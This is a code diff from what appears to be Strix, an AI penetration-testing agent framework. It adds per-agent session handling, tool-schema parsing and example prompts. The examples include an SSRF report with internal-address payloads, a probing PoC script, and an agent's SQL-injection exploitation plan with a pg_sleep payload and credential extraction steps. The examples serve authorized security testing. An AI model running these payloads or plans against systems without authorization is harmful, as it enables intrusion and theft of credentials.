from strix.tools.context import get_current_agent_id
from .python_instance import PythonInstance
class PythonSessionManager:
def __init__(self) -> None:
self.sessions: dict[str, PythonInstance] = {}
self._sessions_by_agent: dict[str, dict[str, PythonInstance]] = {}
self._lock = threading.Lock()
self.default_session_id = "default"
self._register_cleanup_handlers()
def _get_agent_sessions(self) -> dict[str, PythonInstance]:
agent_id = get_current_agent_id()
with self._lock:
if agent_id not in self._sessions_by_agent:
self._sessions_by_agent[agent_id] = {}
return self._sessions_by_agent[agent_id]
def create_session(
self, session_id: str | None = None, initial_code: str | None = None, timeout: int = 30
) -> dict[str, Any]:
if session_id is None:
session_id = self.default_session_id
sessions = self._get_agent_sessions()
with self._lock:
if session_id in self.sessions:
if session_id in sessions:
raise ValueError(f"Python session '{session_id}' already exists")
session = PythonInstance(session_id)
self.sessions[session_id] = session
sessions[session_id] = session
if initial_code:
result = session.execute_code(initial_code, timeout)
@@ -51,11 +59,12 @@ class PythonSessionManager:
if not code:
raise ValueError("No code provided for execution")
sessions = self._get_agent_sessions()
with self._lock:
if session_id not in self.sessions:
if session_id not in sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions[session_id]
session = sessions[session_id]
result = session.execute_code(code, timeout)
result["message"] = f"Code executed in session '{session_id}'"
@@ -65,11 +74,12 @@ class PythonSessionManager:
if session_id is None:
session_id = self.default_session_id
sessions = self._get_agent_sessions()
with self._lock:
if session_id not in self.sessions:
if session_id not in sessions:
raise ValueError(f"Python session '{session_id}' not found")
session = self.sessions.pop(session_id)
session = sessions.pop(session_id)
session.close()
return {
@@ -79,9 +89,10 @@ class PythonSessionManager:
}
def list_sessions(self) -> dict[str, Any]:
sessions = self._get_agent_sessions()
with self._lock:
session_info = {}
for sid, session in self.sessions.items():
for sid, session in sessions.items():
session_info[sid] = {
"is_running": session.is_running,
"is_alive": session.is_alive(),
@@ -89,40 +100,41 @@ class PythonSessionManager:
return {"sessions": session_info, "total_count": len(session_info)}
def cleanup_agent(self, agent_id: str) -> None:
with self._lock:
sessions = self._sessions_by_agent.pop(agent_id, {})
for session in sessions.values():
with contextlib.suppress(Exception):
session.close()
def cleanup_dead_sessions(self) -> None:
with self._lock:
dead_sessions = []
for sid, session in self.sessions.items():
if not session.is_alive():
dead_sessions.append(sid)
for sessions in self._sessions_by_agent.values():
dead_sessions = []
for sid, session in sessions.items():
if not session.is_alive():
dead_sessions.append(sid)
for sid in dead_sessions:
session = self.sessions.pop(sid)
with contextlib.suppress(Exception):
session.close()
for sid in dead_sessions:
session = sessions.pop(sid)
with contextlib.suppress(Exception):
session.close()
def close_all_sessions(self) -> None:
with self._lock:
sessions_to_close = list(self.sessions.values())
self.sessions.clear()
all_sessions: list[PythonInstance] = []
for sessions in self._sessions_by_agent.values():
all_sessions.extend(sessions.values())
self._sessions_by_agent.clear()
for session in sessions_to_close:
for session in all_sessions:
with contextlib.suppress(Exception):
session.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all_sessions)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all_sessions()
sys.exit(0)
_python_session_manager = PythonSessionManager()

View File

@@ -7,9 +7,14 @@ from inspect import signature
from pathlib import Path
from typing import Any
import defusedxml.ElementTree as DefusedET
from strix.utils.resource_paths import get_strix_resource_path
tools: list[dict[str, Any]] = []
_tools_by_name: dict[str, Callable[..., Any]] = {}
_tool_param_schemas: dict[str, dict[str, Any]] = {}
logger = logging.getLogger(__name__)
@@ -82,6 +87,34 @@ def _load_xml_schema(path: Path) -> Any:
return tools_dict
def _parse_param_schema(tool_xml: str) -> dict[str, Any]:
params: set[str] = set()
required: set[str] = set()
params_start = tool_xml.find("<parameters>")
params_end = tool_xml.find("</parameters>")
if params_start == -1 or params_end == -1:
return {"params": set(), "required": set(), "has_params": False}
params_section = tool_xml[params_start : params_end + len("</parameters>")]
try:
root = DefusedET.fromstring(params_section)
except DefusedET.ParseError:
return {"params": set(), "required": set(), "has_params": False}
for param in root.findall(".//parameter"):
name = param.attrib.get("name")
if not name:
continue
params.add(name)
if param.attrib.get("required", "false").lower() == "true":
required.add(name)
return {"params": params, "required": required, "has_params": bool(params or required)}
def _get_module_name(func: Callable[..., Any]) -> str:
module = inspect.getmodule(func)
if not module:
@@ -95,6 +128,27 @@ def _get_module_name(func: Callable[..., Any]) -> str:
return "unknown"
def _get_schema_path(func: Callable[..., Any]) -> Path | None:
module = inspect.getmodule(func)
if not module or not module.__name__:
return None
module_name = module.__name__
if ".tools." not in module_name:
return None
parts = module_name.split(".tools.")[-1].split(".")
if len(parts) < 2:
return None
folder = parts[0]
file_stem = parts[1]
schema_file = f"{file_stem}_schema.xml"
return get_strix_resource_path("tools", folder, schema_file)
def register_tool(
func: Callable[..., Any] | None = None, *, sandbox_execution: bool = True
) -> Callable[..., Any]:
@@ -109,11 +163,8 @@ def register_tool(
sandbox_mode = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not sandbox_mode:
try:
module_path = Path(inspect.getfile(f))
schema_file_name = f"{module_path.stem}_schema.xml"
schema_path = module_path.parent / schema_file_name
xml_tools = _load_xml_schema(schema_path)
schema_path = _get_schema_path(f)
xml_tools = _load_xml_schema(schema_path) if schema_path else None
if xml_tools is not None and f.__name__ in xml_tools:
func_dict["xml_schema"] = xml_tools[f.__name__]
@@ -131,6 +182,11 @@ def register_tool(
"</tool>"
)
if not sandbox_mode:
xml_schema = func_dict.get("xml_schema")
param_schema = _parse_param_schema(xml_schema if isinstance(xml_schema, str) else "")
_tool_param_schemas[str(func_dict["name"])] = param_schema
tools.append(func_dict)
_tools_by_name[str(func_dict["name"])] = f
@@ -153,6 +209,10 @@ def get_tool_names() -> list[str]:
return list(_tools_by_name.keys())
def get_tool_param_schema(name: str) -> dict[str, Any] | None:
return _tool_param_schemas.get(name)
def needs_agent_state(tool_name: str) -> bool:
tool_func = get_tool_by_name(tool_name)
if not tool_func:
@@ -194,3 +254,4 @@ def get_tools_prompt() -> str:
def clear_registry() -> None:
tools.clear()
_tools_by_name.clear()
_tool_param_schemas.clear()
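The `_parse_param_schema` helper added in this file extracts parameter names and `required` flags from a tool's XML block. A sketch of the same logic using the stdlib `ElementTree` (the real code uses `defusedxml` to guard against hostile XML):

```python
import xml.etree.ElementTree as ET


def parse_param_schema(tool_xml: str) -> dict[str, object]:
    """Pull parameter names and required flags out of a <parameters> block."""
    params: set[str] = set()
    required: set[str] = set()
    start = tool_xml.find("<parameters>")
    end = tool_xml.find("</parameters>")
    if start == -1 or end == -1:
        return {"params": set(), "required": set(), "has_params": False}
    section = tool_xml[start : end + len("</parameters>")]
    try:
        root = ET.fromstring(section)
    except ET.ParseError:
        return {"params": set(), "required": set(), "has_params": False}
    for param in root.findall(".//parameter"):
        name = param.attrib.get("name")
        if not name:
            continue
        params.add(name)
        if param.attrib.get("required", "false").lower() == "true":
            required.add(name)
    return {"params": params, "required": required, "has_params": bool(params or required)}
```

This gives the registry enough information to validate tool calls before dispatch, without parsing the full schema file each time.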

View File

@@ -131,5 +131,148 @@ H = High (total loss of availability)</description>
- On success: success=true, message, report_id, severity, cvss_score
- On duplicate detection: success=false, message (with duplicate info), duplicate_of (ID), duplicate_title, confidence (0-1), reason (why it's a duplicate)</description>
</returns>
<examples>
<function=create_vulnerability_report>
<parameter=title>Server-Side Request Forgery (SSRF) via URL Preview Feature Enables Internal Network Access</parameter>
<parameter=description>A server-side request forgery (SSRF) vulnerability was identified in the URL preview feature that generates rich previews for user-supplied links.
The application performs server-side HTTP requests to retrieve metadata (title, description, thumbnails). Insufficient validation of the destination allows an attacker to coerce the server into making requests to internal network hosts and link-local addresses that are not directly reachable from the internet.
This issue is particularly high risk in cloud-hosted environments where link-local metadata services may expose sensitive information (e.g., instance identifiers, temporary credentials) if reachable from the application runtime.</parameter>
<parameter=impact>Successful exploitation may allow an attacker to:
- Reach internal-only services (admin panels, service discovery endpoints, unauthenticated microservices)
- Enumerate internal network topology based on timing and response differences
- Access link-local services that should never be reachable from user input paths
- Potentially retrieve sensitive configuration data and temporary credentials in certain hosting environments
Business impact includes increased likelihood of lateral movement, data exposure from internal systems, and compromise of cloud resources if credentials are obtained.</parameter>
<parameter=target>https://app.acme-corp.com</parameter>
<parameter=technical_analysis>The vulnerable behavior occurs when the application accepts a user-controlled URL and fetches it server-side to generate a preview. The response body and/or selected metadata fields are then returned to the client.
Observed security gaps:
- No robust allowlist of approved outbound domains
- No effective blocking of private, loopback, and link-local address ranges
- Redirect handling can be leveraged to reach disallowed destinations if not revalidated after following redirects
- DNS resolution and IP validation appear to occur without normalization safeguards, creating bypass risk (e.g., encoded IPs, mixed IPv6 notation, DNS rebinding scenarios)
As a result, an attacker can supply a URL that resolves to an internal destination. The server performs the request from a privileged network position, and the attacker can infer results via returned preview content or measurable response differences.</parameter>
<parameter=poc_description>To reproduce:
1. Authenticate to the application as a standard user.
2. Navigate to the link preview feature (e.g., “Add Link”, “Preview URL”, or equivalent UI).
3. Submit a URL pointing to an internal resource. Example payloads:
- http://127.0.0.1:80/
- http://localhost:8080/
- http://10.0.0.1:80/
- http://169.254.169.254/ (link-local)
4. Observe that the server attempts to fetch the destination and returns either:
- Preview content/metadata from the target, or
- Error/timing differences that confirm network reachability.
Impact validation:
- Use a controlled internal endpoint (or a benign endpoint that returns a distinct marker) to demonstrate that the request is performed by the server, not the client.
- If the application follows redirects, validate whether an allowlisted URL can redirect to a disallowed destination, and whether the redirected-to destination is still fetched.</parameter>
<parameter=poc_script_code>import json
import time
from urllib.parse import urljoin
import requests
BASE = "https://app.acme-corp.com"
PREVIEW_ENDPOINT = urljoin(BASE, "/api/v1/link-preview")
SESSION_COOKIE = "" # Set to your authenticated session cookie value if needed
TARGETS = [
"http://127.0.0.1:80/",
"http://localhost:8080/",
"http://10.0.0.1:80/",
"http://169.254.169.254/",
]
def preview(url: str) -> tuple[int, float, str]:
headers = {
"Content-Type": "application/json",
}
cookies = {}
if SESSION_COOKIE:
cookies["session"] = SESSION_COOKIE
payload = {"url": url}
start = time.time()
resp = requests.post(PREVIEW_ENDPOINT, headers=headers, cookies=cookies, data=json.dumps(payload), timeout=15)
elapsed = time.time() - start
body = resp.text
snippet = body[:500]
return resp.status_code, elapsed, snippet
def main() -> int:
print(f"Endpoint: {PREVIEW_ENDPOINT}")
print("Testing SSRF candidates (server-side fetch behavior):")
print()
for url in TARGETS:
try:
status, elapsed, snippet = preview(url)
print(f"URL: {url}")
print(f"Status: {status}")
print(f"Elapsed: {elapsed:.2f}s")
print("Body (first 500 chars):")
print(snippet)
print("-" * 60)
except requests.RequestException as e:
print(f"URL: {url}")
print(f"Request failed: {e}")
print("-" * 60)
return 0
if __name__ == "__main__":
raise SystemExit(main())</parameter>
<parameter=remediation_steps>Implement layered SSRF defenses:
1. Explicit allowlist for outbound destinations
- Only permit fetching from a maintained set of approved domains (and required schemes).
- Reject all other destinations by default.
2. Robust IP range blocking after DNS resolution
- Resolve the hostname and block private, loopback, link-local, and reserved ranges for both IPv4 and IPv6.
- Re-validate on every redirect hop; do not follow redirects to disallowed destinations.
3. URL normalization and parser hardening
- Normalize and validate the URL using a strict parser.
- Reject ambiguous encodings and unusual notations that can bypass filters.
4. Network egress controls (defense in depth)
- Enforce outbound firewall rules so the application runtime cannot reach sensitive internal ranges or link-local addresses.
- If previews are required, route outbound requests through a dedicated egress proxy with policy enforcement and auditing.
5. Response handling hardening
- Avoid returning raw response bodies from previews.
- Strictly limit what metadata is returned and apply size/time limits to outbound fetches.
6. Monitoring and alerting
- Log and alert on preview attempts to unusual destinations, repeated failures, high-frequency requests, or attempts to access blocked ranges.</parameter>
<parameter=attack_vector>N</parameter>
<parameter=attack_complexity>L</parameter>
<parameter=privileges_required>L</parameter>
<parameter=user_interaction>N</parameter>
<parameter=scope>C</parameter>
<parameter=confidentiality>H</parameter>
<parameter=integrity>H</parameter>
<parameter=availability>L</parameter>
<parameter=endpoint>/api/v1/link-preview</parameter>
<parameter=method>POST</parameter>
</function>
</examples>
</tool>
</tools>
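The remediation steps in the SSRF report above call for blocking private, loopback, and link-local ranges after DNS resolution. A minimal sketch of such a check using the stdlib `ipaddress` module; a real deployment also needs redirect revalidation and egress controls, as the report notes, and the function names here are illustrative:

```python
import ipaddress
import socket
from urllib.parse import urlparse


def is_blocked_ip(ip_str: str) -> bool:
    """True if the address is in a range server-side fetches must never reach."""
    ip = ipaddress.ip_address(ip_str)
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local
        or ip.is_reserved
        or ip.is_multicast
    )


def check_outbound_url(url: str) -> bool:
    """Resolve the host and reject the URL if any resolved address is blocked."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False
    # Every resolved address (IPv4 and IPv6) must pass; re-run this check
    # on each redirect hop, since redirects can point back inside.
    return all(not is_blocked_ip(info[4][0]) for info in infos)
```

Checking *resolved* addresses rather than the hostname string is what defeats tricks like `http://localtest.me/` or decimal-encoded IPs, though DNS rebinding still requires pinning the resolved address for the actual fetch.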

View File

@@ -95,6 +95,12 @@
<parameter=command>ls -la</parameter>
</function>
<function=terminal_execute>
<parameter=command>cd /workspace
pwd
ls -la</parameter>
</function>
# Run a command with custom timeout
<function=terminal_execute>
<parameter=command>npm install</parameter>

View File

@@ -1,22 +1,29 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
from strix.tools.context import get_current_agent_id
from .terminal_session import TerminalSession
class TerminalManager:
def __init__(self) -> None:
self.sessions: dict[str, TerminalSession] = {}
self._sessions_by_agent: dict[str, dict[str, TerminalSession]] = {}
self._lock = threading.Lock()
self.default_terminal_id = "default"
self.default_timeout = 30.0
self._register_cleanup_handlers()
def _get_agent_sessions(self) -> dict[str, TerminalSession]:
agent_id = get_current_agent_id()
with self._lock:
if agent_id not in self._sessions_by_agent:
self._sessions_by_agent[agent_id] = {}
return self._sessions_by_agent[agent_id]
def execute_command(
self,
command: str,
@@ -64,24 +71,26 @@ class TerminalManager:
}
def _get_or_create_session(self, terminal_id: str) -> TerminalSession:
sessions = self._get_agent_sessions()
with self._lock:
if terminal_id not in self.sessions:
self.sessions[terminal_id] = TerminalSession(terminal_id)
return self.sessions[terminal_id]
if terminal_id not in sessions:
sessions[terminal_id] = TerminalSession(terminal_id)
return sessions[terminal_id]
def close_session(self, terminal_id: str | None = None) -> dict[str, Any]:
if terminal_id is None:
terminal_id = self.default_terminal_id
sessions = self._get_agent_sessions()
with self._lock:
if terminal_id not in self.sessions:
if terminal_id not in sessions:
return {
"terminal_id": terminal_id,
"message": f"Terminal '{terminal_id}' not found",
"status": "not_found",
}
session = self.sessions.pop(terminal_id)
session = sessions.pop(terminal_id)
try:
session.close()
@@ -99,9 +108,10 @@ class TerminalManager:
}
def list_sessions(self) -> dict[str, Any]:
sessions = self._get_agent_sessions()
with self._lock:
session_info: dict[str, dict[str, Any]] = {}
for tid, session in self.sessions.items():
for tid, session in sessions.items():
session_info[tid] = {
"is_running": session.is_running(),
"working_dir": session.get_working_dir(),
@@ -109,40 +119,41 @@ class TerminalManager:
return {"sessions": session_info, "total_count": len(session_info)}
def cleanup_agent(self, agent_id: str) -> None:
with self._lock:
sessions = self._sessions_by_agent.pop(agent_id, {})
for session in sessions.values():
with contextlib.suppress(Exception):
session.close()
def cleanup_dead_sessions(self) -> None:
with self._lock:
dead_sessions: list[str] = []
for tid, session in self.sessions.items():
if not session.is_running():
dead_sessions.append(tid)
for sessions in self._sessions_by_agent.values():
dead_sessions: list[str] = []
for tid, session in sessions.items():
if not session.is_running():
dead_sessions.append(tid)
for tid in dead_sessions:
session = self.sessions.pop(tid)
with contextlib.suppress(Exception):
session.close()
for tid in dead_sessions:
session = sessions.pop(tid)
with contextlib.suppress(Exception):
session.close()
def close_all_sessions(self) -> None:
with self._lock:
sessions_to_close = list(self.sessions.values())
self.sessions.clear()
all_sessions: list[TerminalSession] = []
for sessions in self._sessions_by_agent.values():
all_sessions.extend(sessions.values())
self._sessions_by_agent.clear()
for session in sessions_to_close:
for session in all_sessions:
with contextlib.suppress(Exception):
session.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all_sessions)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all_sessions()
sys.exit(0)
_terminal_manager = TerminalManager()

View File

@@ -19,33 +19,35 @@
<examples>
# Planning and strategy
<function=think>
<parameter=thought>I need to analyze the scan results systematically. First, let me review
the open ports: 22 (SSH), 80 (HTTP), 443 (HTTPS), and 3306 (MySQL). The MySQL port being
externally accessible is a high priority security concern. I should check for default
credentials and version information. For the web services, I need to enumerate
directories and test for common web vulnerabilities.</parameter>
</function>
# Analysis of tool outputs
<function=think>
<parameter=thought>The Nmap scan revealed 15 open ports, but three stand out as concerning:
- Port 3306 (MySQL) - Database should not be exposed externally
- Port 5432 (PostgreSQL) - Another database port that's risky when public
- Port 6379 (Redis) - Often misconfigured and can lead to data exposure
I should prioritize testing these database services for authentication bypass and
information disclosure vulnerabilities.</parameter>
</function>
# Decision making and next steps
<function=think>
<parameter=thought>Based on the vulnerability scan results, I've identified several critical
issues that need immediate attention:
1. SQL injection in the login form (confirmed with sqlmap)
2. Reflected XSS in the search parameter
3. Directory traversal in the file upload function
I should document these findings with proof-of-concept exploits and assign appropriate
CVSS scores. The SQL injection poses the highest risk due to potential data
exfiltration.</parameter>
</function>
# Deep-dive analysis of a confirmed finding
<function=think>
<parameter=thought>Analysis of the login endpoint SQL injection:
Current State:
- Confirmed SQL injection in POST /api/v1/auth/login
- Backend database is PostgreSQL 14.2
- Application user has full CRUD privileges
Exploitation Strategy:
1. First, enumerate database structure using UNION-based injection
2. Extract user table schema and credentials
3. Check for password hashing (MD5? bcrypt?)
4. Look for admin accounts and API keys
Risk Assessment:
- CVSS Base Score: 9.8 (Critical)
- Attack Vector: Network (remotely exploitable)
- Privileges Required: None
- Impact: Full database compromise
Evidence Collected:
- Error-based injection confirms PostgreSQL
- Time-based payload: admin' AND pg_sleep(5)-- caused 5s delay
- UNION injection reveals 8 columns in users table
Next Actions:
1. Write PoC exploit script in Python
2. Extract password hashes for analysis
3. Create vulnerability report with full details
4. Test if same vulnerability exists in other endpoints</parameter>
</function>
</examples>
</tool>

strix/utils/__init__.py Normal file
View File

strix/utils/resource_paths.py Normal file
View File

@@ -0,0 +1,13 @@
import sys
from pathlib import Path
def get_strix_resource_path(*parts: str) -> Path:
frozen_base = getattr(sys, "_MEIPASS", None)
if frozen_base:
base = Path(frozen_base) / "strix"
if base.exists():
return base.joinpath(*parts)
base = Path(__file__).resolve().parent.parent
return base.joinpath(*parts)